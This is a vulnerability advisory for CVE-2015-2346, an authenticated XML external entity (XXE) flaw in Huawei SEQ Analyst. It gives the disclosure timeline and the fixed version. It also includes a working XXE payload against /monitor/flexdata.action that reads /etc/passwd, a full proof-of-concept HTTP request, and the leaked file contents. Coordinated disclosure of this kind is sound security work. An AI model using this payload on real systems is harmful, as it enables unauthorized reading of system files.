#Document Title:
============
Huawei SEQ Analyst - XML External Entity Injection (XXE)
#Release Date:
===========
15 Apr 2015
#CVE-ID:
=======
CVE-2015-2346
#Product & Service Introduction:
=======================
SEQ Analyst is a platform for business quality monitoring and management by
individual user and multiple vendors in a quasi-realtime and retraceable manner
More Details & Manual ;
http://download.huawei.com/download/filedownload.do?modelID=bulletin&refID=IN0000056669,101
#Vulnerability Disclosure Timeline:
========================
3 Mar 2015 Bug reported to the vendor.
6 Mar 2015 Vendor returned ; investigating
16 Mar 2015 Asked about the case.
16 Mar 2015 Vendor has validated the issue.
17 Mar 2015 There aren't any fix the issue.
18 Mar 2015 CVE number assigned
15 Apr 2015 Fixed
#Affected Product(s):
===============
Huawei Technologies Co. Ltd.
Product: Huawei SEQ Analyst V200R002C03LG0001SPC100 (other versions may bevvulnerable)
#Exploitation Technique:
=================
Local, Authenticated
#Technical Details:
========================
Target Path: /monitor/flexdata.action
Sample Payload : <!DOCTYPE foo [<!ENTITY xxe00c70 SYSTEM
"file:///etc/passwd"> ]>
Affected Parameter: req
#Proof of Concept (PoC):
==================
https://drive.google.com/file/d/0B-LWHbwdK3P9YnVvYXFFZWZKc0k/view?usp=sharing
Request:
POST /monitor/flexdata.action HTTP/1.1
Host: ***:8443
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: JSESSIONID=C07AC243148F4C6F7677E90C1085C2D3;
org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en_US;
locale=en_US; locked=false;
timeNum=1425365144829; timeState=true; loginUserName=testsms;
CASTGC=TGT-549-
skiUgOJowwMXhTwxQ4bH1iHB2XKWmKcJVLJYIlthZ56kqJ9yAZ-cas; lockScreen=false
Connection: keep-alive
Referer: https://
***:8443/monitor/flexrelease/AllNetMonitor.swf/[[DYNAMIC]]/5
Content-type: application/x-www-form-urlencoded
Content-Length: 136
req=<!DOCTYPE%20foo%20[<!ENTITY%20xxe00c70%20SYSTEM%20"file%3a%2f%2f%2fetc%2fpasswd">%20]><Req>%0a%20%20<c
ommand>bizLicenseSetting%26xxe00c70%3b<%2fcommand>%0a<%2fReq>&rdm=Tue%20Mar%203%2008%3A45%3A50%20GMT%2B020
0%202015
Response:
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 06:46:29 GMT
Server: Apache-Coyote/1.1
Cache- Control: no- cache, no-store
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 4281
<html>
<head>
<style type="text/css">
�
<tr class="row_even">
<td class="cell_object">1</td>
<td class="cell_object">2�Command is
bizLicenseSettingnobody:x:65534:65533:nobody:/var/lib/nobody:/bin/false
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:Daemon:/sbin:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/false
root:x:0:0:root:/root:/bin/bash
messagebus:x:103:101:User for D-Bus:/var/run/dbus:/bin/false
ntp:x:74:102:NTP daemon:/var/lib/ntp:/bin/false
ftpsecure:x:104:65534:Secure FTP User:/var/lib/empty:/bin/false
polkituser:x:105:103:PolicyKit:/var/run/PolicyKit:/bin/false
haldaemon:x:106:104:User for haldaemon:/var/run/hald:/bin/false
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
webserver:x:360:1800::/home/webserver:/bin/bash
ecmftp:x:1000:1800::/opt/pub/software:/bin/bash
ftptest:x:1001:1800::/opt/webserver/workspaces/ftp:/bin/bash
httpd:x:361:1801::/home/httpd:/bin/bash
cognos:x:1002:1802::/home/cognos:/bin/bash
ftptrace:x:1003:1800::/opt/webserver/workspaces/ftp/traceserver:/bin/bash
ftpsoc:x:1004:1800::/opt/pub/software:/bin/bash
ftprtmu:x:1005:1800::/opt/webserver/workspaces/ftp/rtmu:/bin/bash</td>
</tr>
<tr class="row_odd">
...
#Solution Fix & Patch:
================
15 Apr 2015 Fixed version --> SEQ Analyst V200R002C03LG0001CP0022
#Credits & Authors:
==============
Ugur Cihan Koc
@_uceka_
www.uceka.com